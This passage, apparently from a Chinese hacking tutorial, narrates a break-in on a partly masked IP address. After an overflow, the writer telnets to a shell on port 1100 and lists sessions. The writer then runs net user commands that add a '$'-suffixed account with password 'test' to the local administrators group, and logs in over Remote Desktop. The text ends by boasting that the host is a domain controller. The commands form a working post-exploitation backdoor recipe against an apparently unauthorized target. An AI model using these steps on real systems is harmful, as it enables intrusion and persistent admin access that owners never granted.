溢出成功!重新打开另外一个命令提示符,敲入如下命令:
telnet 202.2##.*.196 1100
速度很快,返回一个shell,溢出成功。
在telnet界面中敲入如下命令:
net query
显示如下:(图3)
图3
| 以下是引用片段: query user USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >administrator console 0 已断开 . 2007-11-7 17:51 |
进去看看,在Telnet命令提示符下敲入如下命令
| 以下是引用片段: net user asp$ "test" /add net localgroup administrators asp$ /add |
在本机运行“mstsc”,打开“远程桌面连接工具”,
输入IP地址:202.2##.*.196
用户名:asp$
密码:test
连接......
成功进入!
打开“管理工具”,发现这台主机,还是一个域控制器!
